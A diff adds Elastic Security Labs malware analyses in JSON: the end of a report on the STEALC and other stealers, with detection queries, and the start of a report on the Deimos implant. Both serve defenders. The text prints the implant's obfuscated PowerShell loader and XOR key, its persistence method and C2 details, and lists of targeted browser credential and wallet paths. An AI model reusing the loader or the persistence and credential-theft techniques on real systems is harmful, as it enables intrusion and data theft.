This allows the malware to keep a lower profile by using shorter turnarounds in campaigns and limiting the execution in sandbox environments.\n\n#### STEALC - Execution flow\n\nAfter its initial execution, STEALC will send the initial hardware ID of the machine and receive a configuration from the C2 server:\n\n```\nf960cc969e79d7b100652712b439978f789705156b5a554db3acca13cb298050efa268fb|done|tested.file|1|1|1|1|1|1|1|1|\n```\n\nAfter this request, it will send multiple requests to receive an updated list of targeted browsers and targeted browser extensions. Below is an example of the browser configuration, this contains the targeted directory path where the sensitive data is stored.\n\n```\nGoogle Chrome|\\Google\\Chrome\\User Data|chrome|chrome.exe|Google Chrome Canary|\\Google\\Chrome SxS\\User Data|chrome|chrome.exe|Chromium|\\Chromium\\User Data|chrome|chrome.exe|Amigo|\\Amigo\\User Data|chrome|0|Torch|\\Torch\\User Data|chrome|0|Vivaldi|\\Vivaldi\\User Data|chrome|vivaldi.exe|Comodo Dragon|\\Comodo\\Dragon\\User Data|chrome|0|EpicPrivacyBrowser|\\Epic Privacy Browser\\User Data|chrome|0|CocCoc|\\CocCoc\\Browser\\User Data|chrome|0|Brave|\\BraveSoftware\\Brave-Browser\\User Data|chrome|brave.exe|Cent Browser|\\CentBrowser\\User Data|chrome|0|7Star|\\7Star\\7Star\\User Data|chrome|0|Chedot Browser|\\Chedot\\User Data|chrome|0|Microsoft Edge|\\Microsoft\\Edge\\User Data|chrome|msedge.exe|360 Browser|\\360Browser\\Browser\\User Data|chrome|0|QQBrowser|\\Tencent\\QQBrowser\\User Data|chrome|0|CryptoTab|\\CryptoTab Browser\\User Data|chrome|browser.exe|Opera Stable|\\Opera Software|opera|opera.exe|Opera GX Stable|\\Opera Software|opera|opera.exe|Mozilla Firefox|\\Mozilla\\Firefox\\Profiles|firefox|0|Pale Moon|\\Moonchild Productions\\Pale Moon\\Profiles|firefox|0|Opera Crypto Stable|\\Opera Software|opera|opera.exe|Thunderbird|\\Thunderbird\\Profiles|firefox|0|\n```\n\nAt this point, STEALC will then collect a broad range of victim information. 
This information is then formatted, Base64 encoded, and then sent to the C2 server over POST requests using form data fields. \n - Hardware ID\n - Windows OS product info\n - Processor / RAM information\n - Username / computername\n - Local system time / time zone / locale of victim\n - Keyboard layout\n - Battery check (used to determine if laptop or not)\n - Desktop resolution, display info\n - Installed programs, running processes\n\nFor the stealing component, STEALC leverages the received configurations in order to collect various valuable information including:\n - Browser cookies\n - Login data\n - Web data\n - History\n - Cryptocurrency wallets\n\nSTEALC also offers other various configuration options including:\n - Telegram data\n - Discord\n - Tox\n - Pidgin\n - Steam\n - Outlook emails\n\n| | RedLine Stealer | Meta Stealer | Stealc |\n| --- | --- | --- | --- |\n| First time seen in the wild | 2020 | 2022 | 2023 |\n| Source Language | C# | C# | C |\n| Average size (unpacked) | 253 KB | 278 KB | 107 KB |\n| String obfuscation? Algo? 
| Yes | Yes | Yes (custom RC4 + base64) |\n\n\n## Detection\n\nTo fully leverage detection capabilities listed below for these threats with Elastic Security, it is essential to integrate [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) and [Windows](https://docs.elastic.co/en/integrations/windows).\n\n - [Connection to WebService by an Unsigned Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_connection_to_webservice_by_an_unsigned_binary.toml)\n - [Connection to WebService by a Signed Binary Proxy](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_connection_to_webservice_by_a_signed_binary_proxy.toml)\n - [Suspicious DNS Query from Mounted Virtual Disk](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/command_and_control_suspicious_dns_query_from_mounted_virtual_disk.toml)\n - [Suspicious Access to Web Browser Credential Stores](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_suspicious_access_to_web_browser_credential_stores.toml)\n - [Web Browser Credential Access via Unsigned Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_web_browser_credential_access_via_unsigned_process.toml)\n - [Access to Browser Credentials from Suspicious Memory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_access_to_browser_credentials_from_suspicious_memory.toml)\n - [Failed Access Attempt to Web Browser Files](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_failed_access_attempt_to_web_browser_files.toml)\n - [Web Browser Credential Access via Unusual Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_web_browser_credential_access_via_unusual_process.toml)\n\n### ES|QL queries\nThe following list of hunts 
and detection queries can be used to detect stealer activity:\n\n- Identifies untrusted or unsigned executables making DNS requests to Telegram or Discord domains, which may indicate command-and-control communication attempts.\n ``` sql\n from logs-endpoint*\n | where (process.code_signature.trusted == false or process.code_signature.exists == false)\n | where dns.question.name in (\"api.telegram.com\", \"cdn.discordapp.com\",\n \"discordapp.com\", \"discord.com\",\"discord.gg\")\n | stats executable_count = count(*) by process.executable, process.name, dns.question.name\n | sort executable_count desc\n ```\n\n- Detects suspicious activity targeting crypto wallet files and configurations stored on Windows systems.\n\n ``` sql\n from logs-endpoint.events.file-*\n | where @timestamp > now() - 14 days\n | where host.os.type == \"windows\"\n and event.category == \"file\"\n and event.action == \"open\" \n and (\n file.path rlike \"\"\"C:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\.+\\\\(Bitcoin|Ethereum|Electrum|Zcash|Monero|Wallet|Litecoin|Dogecoin|Coinbase|Exodus|Jaxx|MyEtherWallet|MetaMask)\\\\.*\"\"\"\n or file.path rlike \"\"\"C:\\\\ProgramData\\\\.+\\\\(Bitcoin|Ethereum|Electrum|Zcash|Monero|Wallet|Litecoin|Dogecoin|Coinbase|Exodus|Jaxx|MyEtherWallet|MetaMask)\\\\.*\"\"\"\n )\n | keep process.executable, process.name, host.id, file.path, file.name\n | stats number_hosts = count_distinct(host.id), unique_files = count_distinct(file.name) by process.executable\n | where number_hosts == 1 and unique_files >= 3\n | sort number_hosts desc\n ```\n\n- Monitors access to sensitive browser data, such as cookies, login data, and browsing history, which may indicate information-stealing malware activities.\n\n ``` sql\n from logs-endpoint.events.file-*, logs-windows.sysmon_operational-default-*\n | where @timestamp > now() - 14 days\n | where host.os.type == \"windows\"\n and event.category == \"file\"\n and event.action in (\"open\", 
\"modification\")\n and (\n file.path rlike \"C:\\\\\\\\Users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Local\\\\\\\\(Google\\\\\\\\Chrome\\\\\\\\User Data\\\\\\\\.*|Google\\\\\\\\Chrome SxS\\\\\\\\User Data\\\\\\\\.*|Chromium\\\\\\\\User Data\\\\\\\\.*|Amigo\\\\\\\\User Data\\\\\\\\.*|Torch\\\\\\\\User Data\\\\\\\\.*|Vivaldi\\\\\\\\User Data\\\\\\\\.*|Comodo\\\\\\\\Dragon\\\\\\\\User Data\\\\\\\\.*|Epic Privacy Browser\\\\\\\\User Data\\\\\\\\.*|CocCoc\\\\\\\\Browser\\\\\\\\User Data\\\\\\\\.*|BraveSoftware\\\\\\\\Brave-Browser\\\\\\\\User Data\\\\\\\\.*|CentBrowser\\\\\\\\User Data\\\\\\\\.*|7Star\\\\\\\\7Star\\\\\\\\User Data\\\\\\\\.*|Chedot\\\\\\\\User Data\\\\\\\\.*|Microsoft\\\\\\\\Edge\\\\\\\\User Data\\\\\\\\.*|360Browser\\\\\\\\Browser\\\\\\\\User Data\\\\\\\\.*|Tencent\\\\\\\\QQBrowser\\\\\\\\User Data\\\\\\\\.*|CryptoTab Browser\\\\\\\\User Data\\\\\\\\.*|Opera Software\\\\\\\\Opera Stable\\\\\\\\.*|Opera Software\\\\\\\\Opera GX Stable\\\\\\\\.*)\\\\\\\\(Default|Profile \\\\\\\\d+)\\\\\\\\(Cookies|Login Data|Web Data|History|Bookmarks|Preferences|Visited Links|Network Action Predictor|Top Sites|Favicons|Shortcuts)\"\n or file.path rlike \"C:\\\\\\\\Users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Mozilla\\\\\\\\Firefox\\\\\\\\Profiles\\\\\\\\.*\\\\\\\\(cookies.sqlite|logins.json|places.sqlite|key4.db|cert9.db)\"\n or file.path rlike \"C:\\\\\\\\Users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Moonchild Productions\\\\\\\\Pale Moon\\\\\\\\Profiles\\\\\\\\.*\\\\\\\\(cookies.sqlite|logins.json|places.sqlite|key3.db|cert8.db)\"\n or file.path rlike \"C:\\\\\\\\Users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Thunderbird\\\\\\\\Profiles\\\\\\\\.*\\\\\\\\(cookies.sqlite|logins.json|key4.db|cert9.db)\"\n )\n | keep process.executable, process.name, event.action, host.id, host.name, file.path, file.name\n | eval process_path = replace(process.executable, 
"([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}|ns[a-z][A-Z0-9]{3,4}\\\\.tmp|DX[A-Z0-9]{3,4}\\\\.tmp|7z[A-Z0-9]{3,5}\\\\.tmp|[0-9\\\\.\\\\-_]{3,})\", \"\")\n | eval process_path = replace(process_path, \"[cC]:\\\\\\\\[uU][sS][eE][rR][sS]\\\\\\\\[a-zA-Z0-9\\\\.\\\\-_\\\\$~ ]+\\\\\\\\\", \"C:\\\\\\\\users\\\\\\\\user\\\\\\\\\")\n | eval normalized_file_path = replace(file.path, \"[cC]:\\\\\\\\[uU][sS][eE][rR][sS]\\\\\\\\[a-zA-Z0-9\\\\.\\\\-_\\\\$~ ]+\\\\\\\\\", \"C:\\\\\\\\users\\\\\\\\user\\\\\\\\\")\n | stats number_hosts = count_distinct(host.id) by process.executable, process.name, event.action, normalized_file_path, file.name, host.name\n | where number_hosts == 1\n | sort number_hosts desc\n ```\n\n### Yara rules\n - [Windows Trojan MetaStealer](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_MetaStealer.yar)\n - [Windows Trojan Stealc](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Stealc.yar)\n - [Windows Trojan RedLineStealer](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_RedLineStealer.yar)\n - [Windows Trojan AgentTesla](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_AgentTesla.yar)\n\n\n## Conclusion\nIt's crucial to recognize that these malware threats pose significant risks to companies and individuals alike. Their affordability makes them accessible not only to sophisticated cybercriminals but also to small-time offenders and script kiddies. This accessibility underscores the democratisation of cybercrime, where even individuals with limited technical expertise can deploy malicious software.\n\nElastic's comprehensive suite of security features offers organisations and individuals the tools they need to defend against malware attacks effectively, from advanced threat detection to real-time monitoring and response capabilities.\n"
+ },
+ "title": "Globally distributed stealers",
+ "slug": "globally-distributed-stealers",
+ "date": "2024-05-24",
+ "description": "This article describes our analysis of the top malware stealer families, unveiling their operation methodologies, recent updates, and configurations. By understanding the modus operandi of each family, we better comprehend the magnitude of their impact and can fortify our defences accordingly.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "terrance-dejesus"
+ },
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "Security Labs Images 25.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ]
+ },
+ "id": "security_labs_content-globally_distributed_stealers-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-going_coast_to_coast_climbing_the_pyramid_with_the_deimos_implant-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-going_coast_to_coast_climbing_the_pyramid_with_the_deimos_implant-md.json
new file mode 100644
index 00000000000..42de8669f67
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-going_coast_to_coast_climbing_the_pyramid_with_the_deimos_implant-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Going Coast to Coast - Climbing the Pyramid with the Deimos Implant\"\nslug: \"going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant\"\ndate: \"2022-06-08\"\ndescription: \"The Deimos implant was first reported in 2020 and has been in active development; employing advanced analysis countermeasures to frustrate analysis. This post details the campaign TTPs through the malware indicators.\"\nauthor:\n - slug: andrew-pease\n - slug: daniel-stepanic\n - slug: derek-ditch\nimage: \"blog-security-radar-720x420.png\"\ncategory:\n - slug: malware-analysis\n---\n\n> - A remote access tool is actively being developed in campaigns beyond the initially reported Jupyter Infostealer, SolarMarker, and Yellow Cockatoo campaigns\n> - The malware employs multiple layers of complex obfuscation and encryption techniques\n> - The malware has incorporated convincing lure files and digitally signed installation executables\n> - The malware is part of intrusion sets that are used to establish an initial foothold and maintain persistence into contested environments\n> - A successful takedown was completed by the Elastic Security team for the observed C2 infrastructure\n\nThe Deimos implant is a new, complex form of malware first reported in 2020. This remote access tool is under active development, with the aim of evading detection by using multiple layers of complex obfuscation and encryption techniques.\n\nThese advanced defensive countermeasures, which also include convincing lure files and digitally signed installation executables, can frustrate identification and analysis. However, the Elastic Security team recently completed a successful takedown of the observed command and control (C2) infrastructure, allowing us to provide detection rules and hunting techniques to aid in identifying this powerful implant.\n\nThis post details the tactics, techniques, and procedures, or TTPs, of the Deimos implant. 
Our goal is to help security practitioners leverage the Elastic Stack to collect and analyze malware and intrusion data by revealing information about how Deimos works that its creators have attempted to obscure for defensive purposes.\n\n## Overview\n\nThe Elastic Intelligence & Analytics team tracks a new strain of the Deimos initial access and persistence implant previously associated with the [Jupyter Infostealer](https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1) malware (tracked elsewhere as [Yellow Cockatoo](https://redcanary.com/blog/yellow-cockatoo), and [SolarMarker](https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis)). This implant has demonstrated a maturation of obfuscation techniques as a result of published research. This indicates that the activity group is actively modifying its codebase to evade detective countermeasures.\n\nThe sample we observed was not leveraged as an information stealer. It is an implant that provides initial access, persistence, and C2 functions. This makes the implant powerful in that it can be used to accomplish any tasks that require remote access. It is likely that these intrusions are the beginning of a concentrated campaign against the victims or will be sold off in bulk for other campaigns unassociated with the access collection.\n\nThe analysis will leverage David Bianco's [Pyramid of Pain](http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html) analytical model to describe the value of atomic indicators, artifacts, tool-markings, and TTPs to the malware authors and how uncovering them can impact the efficiency of the intrusion sets leveraging this implant. 
Additionally, we are providing some host-based hunting techniques and detection rules that can be leveraged to identify this implant and others that share similar artifacts and TTPs.\n\n## Details\n\nOn August 31, 2021, Elastic observed process injection telemetry that shared techniques with the Jupyter Infostealer as reported by Morphisec, Binary Defense, and security researcher Squibydoo [[1](https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction)] [[2](https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer)] [[3](https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1)] [[4](https://squiblydoo.blog/2021/05/02/mars-deimos-solarmarker-jupyter-infostealer-part-1)] [[5](https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two)]. As we began analysis and compared the samples we observed to prior research, we identified a change in the way obfuscation was implemented. This change may be the result of several factors, one of which is an attempt by the adversary to bypass or otherwise evade existing defenses or malware analysis.\n\n_Note: As previous versions of this malware have been thoroughly documented, we will focus on newly observed capabilities and functionality._\n\nDuring dynamic analysis of the malware, we observed behavior similar to that which had been reported elsewhere - namely obfuscation using a litany of runtime-created variables (variables that are unique to each execution), directories, an XOR cipher, and Base64 encoded commands. Below is an example of the new obfuscation tactics employed by the malware author to hinder analysis. 
We'll discuss this in detail as we unpack the malware's execution.\n\n```\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -command \"$650326ac2b1100c4508b8a700b658ad7='C:\\Users\\user1\\d2e227be5d58955a8d12db18fca5d787\\a5fb52fc397f782c691961d23cf5e785\\4284a9859ab2184b017070368b4a73cd\\89555a8780abdb39d3f1761918c40505\\83e4d9dd7a7735a516696a49efcc2269\\d1c086bb3efeb05d8098a20b80fc3c1a\\650326ac2b1100c4508b8a700b658ad7';$1e3dadee7a4b45213f674cb23b07d4b0='hYaAOxeocQMPVtECUZFJwGHzKnmqITrlyuNiDRkpgdWbSsfjvLBX';$d6ffa847bb31b563e9b7b08aad22d447=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($650326ac2b1100c4508b8a700b658ad7));remove-item $650326ac2b1100c4508b8a700b658ad7;for($i=0;$i -lt $d6ffa847bb31b563e9b7b08aad22d447.count;)\\{for($j=0;$j -lt $1e3dadee7a4b45213f674cb23b07d4b0.length;$j++)\\{$d6ffa847bb31b563e9b7b08aad22d447[$i]=$d6ffa847bb31b563e9b7b08aad22d447[$i] -bxor $1e3dadee7a4b45213f674cb23b07d4b0[$j];$i++;if($i -ge $d6ffa847bb31b563e9b7b08aad22d447.count)\\{$j=$1e3dadee7a4b45213f674cb23b07d4b0.length\\}\\}\\};$d6ffa847bb31b563e9b7b08aad22d447=[System.Text.Encoding]::UTF8.GetString($d6ffa847bb31b563e9b7b08aad22d447);iex $d6ffa847bb31b563e9b7b08aad22d447;\"\n```\n\n_Figure 1: PowerShell executed by malware installer_\n\nThe sample we observed created a Base64-encoded file nested several subdirectories deep in the %USERPROFILE% directory and referenced this file using a runtime variable in the PowerShell script ($650326ac2b1100c4508b8a700b658ad7 in our sample). Once this encoded file was read by PowerShell, it is deleted as shown in Figure 2. Other published research observed the Base64 string within the PowerShell command which made it visible during execution. 
This shows an adaptation of the obfuscation techniques leveraged by the malware authors in response to reports published by security researchers.\n\n```\nFromBase64String([System.IO.File]::ReadAllText($650326ac2b1100c4508b8a700b658ad7));remove-item $650326ac2b1100c4508b8a700b658ad7\n```\n\n_Figure 2: Base64 encoded file read and then deleted_\n\nAdditionally, there was the inclusion of another variable ($1e3dadee7a4b45213f674cb23b07d4b0 in our example) with a value of hYaAOxeocQMPVtECUZFJwGHzKnmqITrlyuNiDRkpgdWbSsfjvLBX. By deobfuscating the PowerShell command, we determined that this value was the XOR key used to decrypt the value of the 650326ac2b1100c4508b8a700b658ad7 file. Now that we had the location of the Base64 encoded file and the ability to decrypt it, we needed to prevent it from being deleted.\n\nTo do this, we leveraged the [FileDelete](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-23-filedelete-file-delete-archived) event configuration for Sysmon. By default, this creates a directory in the \"C:\\Sysmon\" directory and then places all deleted files (named by the file MD5 + SHA256 hashes + 33 0's + extension) in that folder. This directory is only available to the SYSTEM user. We used [PSExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) to access the folder (psexec -sid cmd). The file contained a single-line Base64-encoded string.\n\nAs we observed in the PowerShell above, the contents are protected using an XOR cipher, but a cipher we have the key for. 
Using the command-line tools [base64](https://linux.die.net/man/1/base64) and [xortool](https://github.com/hellman/xortool), we're able to decode and decrypt the file:\n\n- base64\n - -D - use the base64 program to decode\n - -i - the input file to be decoded\n - -o - the output file to save the decoded content\n- xortool-xor\n - -r - the XOR cipher key\n - -f - the file that is XOR encrypted\n - \\\\> - output the decrypted file\n\n```\nbase64 -D -i 650326ac2b1100c4508b8a700b658ad7.encoded \\\n-o 650326ac2b1100c4508b8a700b658ad7.decoded\n\nxortool-xor -r hYaAOxeocQMPVtECUZFJwGHzKnmqITrlyuNiDRkpgdWbSsfjvLBX \\\n-f 650326ac2b1100c4508b8a700b658ad7.decoded \\\n\\> 650326ac2b1100c4508b8a700b658ad7.xor\n```\n\n_Figure 3: Decrypting the XOR'd Base64 encoded file_\n\nThis resulted in another obfuscated file that started with an XOR'd Base64-encoded variable and ended with more PowerShell.\n\n```\n$adab58383614f8be4ed9d27508c2b='FTDSclNHUTdlaXBxnKdZa9pUUW9iakpFGDBaelBHbE9mbTVZYlVFbWIxZ...\n\n...CReaTEShorTcuT($ENV:APpDATa+'\\m'+'IcR'+'OSO'+'Ft'+'\\w'+'Ind'+'OW'+'S\\'+'sT'+'ARt'+' ME\n'+'nU'+'\\pr'+'OGR'+'aMS\\'+'sT'+'ART'+'uP'+'\\a44f066dfa44db9fba953a982d48b.LNk');$a78b0ce650249ba927e4cf43d02e5.tARGETpaTh=$a079109a9a641e8b862832e92c1c7+'\\'+$a7f0a120130474bdc120c5f\n13775a;$a78b0ce650249ba927e4cf43d02e5.WInDoWSTYLE=7;$a78b0ce650249ba927e4cf43d02e5.sAvE();IEx $a54b6e0f7564f4ad0bf41a1875401;\n```\n\n_Figure 4: Final obfuscated file (truncated)_\n\nFollowing the same process as before, we identified the XOR key (which may have been trying to use an = sign to appear to look like it was Base64) and decoded the file.\n\n```\nXjBrPGQ7aipqcXYkbTQobjJEX0ZzPGlOfm5YbUEmb1dBazZ0RlpCa2hLQks8eXNxK3tsRHpZVmtmUU9mb31jaVVuMXUxUGk/e0tDa0QmXjA8U0ZAckhgNl5vX1deQGBad2peTyZvVUByaSk2XlBJMTxAdEtnT0B3fnBJPCtfe2tvV0d7P3Y0V2BaeXQ9PmhtI3ZaVHc3I2tGcm5IRmlmUTV8bXpxXlg/cyo8XyFwXyt5QmwjOChQZ09aPXxqaS1hfmxDK3U=\n```\n\n_Figure 5: XOR cipher key_\n\nThis process yielded a .NET DLL file that creates an 
implant tracking ID and files used for persistence (more about the tracking ID is in the Analysis - Initial Access section).\n\n```\nadab58383614f8be4ed9d27508c2b: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\n```\n\n_Figure 6: .NET DLL file type_\n\nThe DLL calls itself Mars.Deimos and correlates to previous research by Morphisec, Binary Defense, and security researcher Squibydoo [[1](https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction)] [[2](https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer)] [[3](https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1)] [[4](https://squiblydoo.blog/2021/05/02/mars-deimos-solarmarker-jupyter-infostealer-part-1)] [[5](https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two)]. The particular samples that we've observed utilize the .NET hardening tool [Dotfuscator CE 6.3.0](https://www.preemptive.com/dotfuscator/ce/docs/help/index.html) to hinder malware analysis.\n\nWhat we found particularly interesting is that the authors have spent time modifying the malware in an attempt to make it harder to detect, indicating that they're incentivized to maintain the malware. This is good to know as we move into the analysis phase because it means that we can make an impact on a valuable malware implant that will frustrate those using it for financial gain.\n\n## Analysis\n\nAll indicators referenced in the analysis are located in the Indicators section.\n\n### The Pyramid of Pain\n\nBefore we get into the analysis, let's discuss the model we used to help guide our process.\n\nIn 2013, security researcher David Bianco released an analytical model called the [Pyramid of Pain](http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html). The model is intended to understand how uncovering different parts of an intrusion can impact a campaign. 
As you can see in the model below, identifying hash values is useful, but hashes are easily changed by an adversary, whereas TTPs are very difficult for an adversary to change.\n\n\n\nThe goal of using the Pyramid of Pain is to understand as much about the intrusion as possible and project the impact (read: the amount of \"pain\") you can inflict. Throughout the analysis of the observed samples, we'll overlay them onto the Pyramid of Pain as an illustrative method to assess the potential impact.\n\n### File Hashes\n\nOnce we identified that we had observed a new variant of the malware sample, we applied search queries to our dataset and identified 10 unique organizations across multiple verticals, indicating that this did not appear to be targeted. From those 10 organizations, we observed 10 different initial-installer file hashes. The dropped encoded files are also all different.\n\nSo while this information is useful, it is apparent that using a file hash as a detection method would not be useful across organizations.\n\n### IP Addresses\n\nAs other researchers have noted, we observed the same IP address used in the campaign. This IP address was [first associated](https://www.virustotal.com/gui/ip-address/216.230.232.134/relations) with malicious files on August 30, 2021.\n\n```\nIP 216.230.232.134\nAnycast false\nCity Houston\nRegion Texas\nCountry United States (US)\nLocation 29.7633,-95.3633\nOrganization AS40156 The Optimal Link Corporation\nPostal 77052\nTimezone America/Chicago\n```\n\n_Figure 8: Information on identified IP address_\n\nThis IP address has been reported to multiple abuse sites and identified independently by multiple security researchers. 
We initiated a successful takedown request of the IP address on September 21, 2021, which has removed the observed C2 infrastructure access to any implants.\n\nWhile this atomic indicator is useful for blocking on a firewall, it is trivial for an adversary to change to another IP address, so let’s try to get higher up the pyramid and make a bigger impact on the adversary.\n\n### Artifacts\n\n#### Resource Development\n\nThe lure file samples we analyzed were predominantly signed by organizations in Scandinavian and Slavic-speaking countries, with two outliers from English and French-speaking countries. Multiple samples were signed with a digital certificate registered as a \"Spoloènos s Ruèením Obmedzeným\" (S.R.O.). An [S.R.O.](https://www.offshorecompany.com/company/slovakia-s-r-o/) is a business designation for Slovakian businesses owned by a foreign entity.\n\nThe S.R.O. that we observed as owning the digital signatures (SRO #1) was formed on July 29, 2021, and the signature was observed starting on August 26, 2021. Additionally, the S.R.O. that we observed is owned by a different S.R.O. (SRO #2).\n\n\n\nSRO #2 has been in business since August 19, 2014, and provides a variety of services. 
The owner of SRO #2 has a single-named partner located in a country in the former Eastern Bloc of Europe (Executive manager).\n\n\n\nWe are unable to state definitively if the organizations or people are intentionally involved, cutouts, or unwilling participants, so we will not be naming them. This process of obtaining possibly stolen certificates aligns with other samples we analyzed. It is obvious that however these certificates were procured, the person (or persons) responsible appear well-versed in the bureaucracies and laws required in registering a foreign-owned business in Slovakia.\n\n#### Initial Access\n\nWe observed the most indicators in this tier. Indicators in the Artifacts tier, both host and network, are valuable to a defender because they are difficult for an adversary to change without considerable rearchitecting of the way the malware functions. This differs from atomic indicators (hashes and infrastructure) in that those elements are modular and can simply be updated. Artifacts, like cipher keys (as we'll see below), are often hard-coded into the source code prior to compilation and require significant work to adjust.\n\nThe dropper creates a series of nested directories whose names are 32 characters long, alphanumeric, and lowercase. In all cases we've observed, there are six nested directories, and a single file within the final subdirectory using the same naming convention. During the initial execution, this file is loaded, deobfuscated with a 52-byte static XOR key, and then executed as a PowerShell script. We have included a hunting query in the Detection section that identifies this activity.\n\nAdditionally, the .Net assembly creates a string by listing all files located at %USERPROFILE%\\APPDATA\\ROAMING. This is stored as the hwid value, which is a unique identifier for this machine. 
If the file doesn't exist yet, it is created by generating 32 random bytes and encoding them with a custom Base64 encoding.\n\n#### Persistence\n\nOnce executed, the PowerShell script establishes persistence of the malware by generating between 100 and 200 files in a directory named `%APPDATA%\\Microsoft\\<random string>`. The random string contains only lowercase and uppercase letters A-Z and the digits 0-9. It can be anywhere from 10 to 20 characters in length. This directory is the staging directory. These files contain randomly generated bytes between 50,000 bytes and 200,000 bytes. The files themselves are named `<random string>.<random string>`, where each random string follows the same convention as the directory name. Lastly, one final file, which contains an obfuscated .Net DLL, is written to this directory. This is the actual Deimos implant. It resembles the dummy files with similar attributes in this directory, further attempting to evade defenses.\n\nNext, the script creates two registry keys that provide a Windows shell handler for the first file of random data created above. It uses the file extension of that file to associate a request to execute it with running a PowerShell command. The registry keys are created at `HKEY_CURRENT_USER\\Software\\Classes\\<random string>`, where the random string follows the same convention as mentioned above, except for all lowercase characters. The first key will further have a subkey of \\Shell\\Open\\Command that contains the loader PowerShell script. The string value itself has mixed cases in an effort to be more difficult to search for. For example, PowErShELl was used in our sample. The second key is effectively an alias that matches the file extension of the first randomly generated file above. Its value matches the lowercase value of the random string used in the first key's path.\n\nThe final persistence artifact is a .LNk file that is placed in the user's StartUp directory. 
In this sample, it is hard-coded to be named a44f066dfa44db9fba953a982d48b.LNk. The shortcut is set to launch the first randomly generated file above and will open in a minimized window. Upon user login, the link file will tell Windows to launch the file, but it isn't executable. The registry keys above tell Windows to launch the PowerShell command configured in the first key above to execute the file. The PowerShell command contains the full path to the obfuscated .Net DLL and the XOR key to deobfuscate it. Finally, the .Net DLL assembly will be executed by PowerShell by calling the class method [Mars.Deimos]::interact(). This persistence architecture can be difficult to follow in text, so below is a visual representation of the persistence mechanism.\n\n\n\n#### Command and Control Phase\n\nThe malware provides a general-purpose implant that can perform any action at its privilege level. Namely, it can receive and execute a Windows PE file, a PowerShell script, a .Net DLL assembly, or run arbitrary PowerShell commands.\n\nThere are a few command-specific permutations of payload encapsulations, but they are passed to a common method to perform the web request to the C2 server. The web request uses an HTTP POST method and sets a 10-minute timeout on establishing communication.\n\nNo additional headers are set other than the default headers populated by the .Net WebRequest provider, which are: Host, Content-Length, and Connection: Keep-Alive.\n\n```\nPOST / HTTP/1.1\nHost: 216.230.232.134\nContent-Length: 677\nConnection: Keep-Alive\n```\n\n_Figure 12: C2 HTTP headers_\n\nFigure 13 depicts the hex dump of the body of the client's POST request.\n\n\n\nThe first bytes in white are randomly generated and prepended to the body to obfuscate patterns in network communication. There will be between 0 and 512 of these bytes. Next, shown in green, is a null byte, marking the end of random data. 
The next 10 bytes, shown in blue, are a “cookie” value sent in the last communication from the server. This is likely to prevent replaying captured packets to the server, as each communication is unique. There is nothing specific requiring this to be 10 bytes, but in all traffic we observed, this was the case. In the case of the initial check-in, this is not present. Finally, the remaining bytes shown in red here are the encrypted body. For the initial check-in, this is exactly 256-bytes of RSA encrypted data that includes the key that will be used in follow-on communications, and the unique hardware ID for this implant. For the remaining communications, the client uses AES-128 CBC mode for encryption. For AES encryption, this portion will always be a multiple of 16-bytes in length.\n\nThe RSA public key used for the initial handshake is unique for each campaign. Using the YARA rule in [Figure 24](#yara-rules), we were able to discover a total of 65 samples of the implant. The RSA key provided a pivot to discern unique campaigns, spanning countries from the United States to Moldova. Only 12.5% of the samples included information stealing features, similar to what has been observed with the Jupyter Infostealer. The rest of the samples were the Deimos implant with no additional info stealing capabilities. This could mean that the implant is gaining in popularity as it is full-featured and can be used for initial access and persistence for any campaigns.\n\n#### Main Loop\n\nOnce the check-in process is completed, the main process loop begins. The default action of the implant during the main loop is the ping action. 
